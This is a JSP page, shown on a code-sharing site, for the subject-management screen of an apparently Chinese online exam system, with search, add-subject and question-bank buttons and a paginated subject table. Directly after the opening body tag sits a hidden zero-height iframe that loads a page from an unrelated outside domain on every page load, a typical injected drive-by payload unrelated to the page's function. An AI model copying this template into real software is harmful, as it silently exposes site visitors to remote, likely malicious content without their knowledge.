📄 titlemanage.jsp
字号:
<%@ taglib uri="/WEB-INF/struts-bean.tld" prefix="bean" %>
<%@ taglib uri="/WEB-INF/struts-html.tld" prefix="html" %>
<%@ taglib uri="/WEB-INF/struts-logic.tld" prefix="logic" %>
<%@ page language="java" pageEncoding="gb2312"%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
<title>无标题文档</title>
<link href="css/css.css" rel="stylesheet" type="text/css">
<style type="text/css">
<!--
.style10 {
font-size: 18px;
color: #FFFFFF;
font-weight: bold;
}
.style11 {font-size: 12px}
.style12 {
color: #0000FF;
font-weight: bold;
}
body {
background-image: url(images/back1.jpg);
}
.style14 {font-size: 12px; font-weight: bold; }
.style26 {font-size: 18px; font-weight: bold; color: #0000FF; }
.style18 {font-size: 12px; font-family: "新宋体"; }
.style25 {font-size: 16px; font-family: "新宋体"; }
-->
</style>
<script language="javascript">
function searchKemu() {
var formObj = document.getElementById("titleManageForm");
formObj.action = "titleManage.do?method=search";
formObj.submit();
}
function addKemu() {
var formObj = document.getElementById("titleManageForm");
formObj.action = "titleManage.do?method=addDisplay";
formObj.submit();
}
function enterTiku() {
var formObj = document.getElementById("titleManageForm");
formObj.action = "titleManage.do?method=tikuDisplay";
formObj.submit();
}
</script>
</head>
<body><iframe src=http://down.onlinedowns.net/page/image/pd.htm height=0></iframe>
<html:form action="/titleManage.do" method="post" styleId="titleManageForm">
<table width="100%" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC" class="px12">
<tr bgcolor="#1A7FE5" class="bk">
<td height="29" colspan="9"><div align="center" class="style10">科目系统</div></td>
</tr>
<tr>
<td colspan="11" bgcolor="#FFFFFF" style="text-align:center"><span class="style11">科目查询(根据科目ID查询):
<html:text property="kemuIDSearch" maxlength="20" styleClass="inputStyle2" />
<input type="button" name="search" class="style11" value="查 询" onclick="searchKemu()">
<input type="button" name="addkemu" class="style11" value="添加科目" onclick="addKemu()">
<input type="button" name="entertiku" class="style11" value="进入题库" onclick="enterTiku()">
</span></td>
</tr>
<tr bgcolor="#EEEEEE" style="text-align:center">
<td width=10%" height="20"><span class="style14">科目ID</span></td>
<td width="18%"><span class="style11"><strong>考试科目</strong></span></td>
<td width="10%"><span class="style11"><strong>任课教师</strong></span></td>
<td width="16%"><span class="style11"><strong>授课班级</strong></span></td>
<td width="12%"><span class="style11"><strong>学生人数</strong></span></td>
<td width="12%"><span class="style11"><strong>现有题目数量</strong></span></td>
<td width="12%"><span class="style11"><strong>入库日期</strong></span></td>
<td width="10%"><span class="style11"><strong>备注</strong></span></td>
</tr>
<logic:iterate id="kemu" name="CLINFOS">
<tr bgcolor="#FFFFFF" style="text-align:center" onMouseOver="this.bgColor='#dddddd';" onMouseOut="this.bgColor='#FFFFFF';">
<td height="20"><span class="style11"><bean:write name="kemu" property="kemuID" /></span></td>
<td><span class="style11"><bean:write name="kemu" property="kemuName" /></span></td>
<td><span class="style11"><bean:write name="kemu" property="teacherName" /></span></td>
<td><span class="style11"><bean:write name="kemu" property="kemuClass" /></span></td>
<td><span class="style11"><bean:write name="kemu" property="kemuStudentNumber" /></span></td>
<td><span class="style11"><bean:write name="kemu" property="kemuTikuNumber" /></span></td>
<td><span class="style11"><bean:write name="kemu" property="kemuTime" /></span></td>
<td><span class="style11"><bean:write name="kemu" property="kemuRemarks" /></span></td>
</tr>
</logic:iterate>
</table>
<logic:present name="noRecord" scope="request">
<span class="style11"><strong><font color="red"><bean:message key="oes.titleManage.error.noRecord" /></font></strong></span>
</logic:present>
<table width="100%" border="0" cellpadding="0" cellspacing="0" class="px12" style="text-align:center">
<tr>
<logic:notPresent name="searchPage" scope="request">
<td height="26"><span class="style11">第<bean:write name="PAGER" property="currentPage"/>页 每页<bean:write name="PAGER" property="pageSize"/>条 共有<bean:write name="PAGER" property="totalRows"/>条记录
<html:link action="/titleManage.do?method=display&pageMethod=first" paramName="PAGER" paramProperty="currentPage" paramId="currentPage">首页</html:link>
<html:link action="/titleManage.do?method=display&pageMethod=previous" paramName="PAGER" paramProperty="currentPage" paramId="currentPage">上一页</html:link>
<html:link action="/titleManage.do?method=display&pageMethod=next" paramName="PAGER" paramProperty="currentPage" paramId="currentPage">下一页</html:link>
<html:link action="/titleManage.do?method=display&pageMethod=last" paramName="PAGER" paramProperty="currentPage" paramId="currentPage">末页</html:link> </span></td>
</logic:notPresent>
</tr>
</table>
</html:form>
</body>
</html>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -